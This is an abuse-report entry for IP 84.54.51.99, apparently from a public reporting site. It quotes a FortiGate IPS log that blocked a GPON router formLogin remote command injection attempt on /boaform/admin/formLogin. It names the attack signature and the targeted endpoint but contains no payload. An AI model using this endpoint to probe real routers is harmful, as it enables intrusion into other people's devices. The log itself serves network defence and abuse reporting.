🇳🇱 84.54.51.99	30 Aug 2023	date=2023-08-29 time=20:07:18 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=16933288383776069 ... show more date=2023-08-29 time=20:07:18 devname=FGT_100E_HQ devid=FG100ETK20011849 eventtime=1693328838377606929 tz="+0300" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" severity="high" srcip=84.54.51.99 srccountry="Netherlands" dstip=192.168.10.69 dstcountry="Reserved" srcintf="port15" srcintfrole="undefined" dstintf="SoftSwitch_1" dstintfrole="lan" sessionid=30364312 action="dropped" proto=6 service="HTTP" policyid=115 poluuid="e5891234-60cd-51ed-2098-ed07f28df2bd" policytype="policy" attack="Multiple.Routers.GPON.formLogin.Remote.Command.Injection" srcport=49678 dstport=80 hostname="81.196.84.26" url="/boaform/admin/formLogin" agent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" httpmethod="POST" referralurl="http://81.196.84.26:80/admin/login.asp" direction="outgoing" attackid=52588 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID52588" incidentserialno=5736678 show less	Web App Attack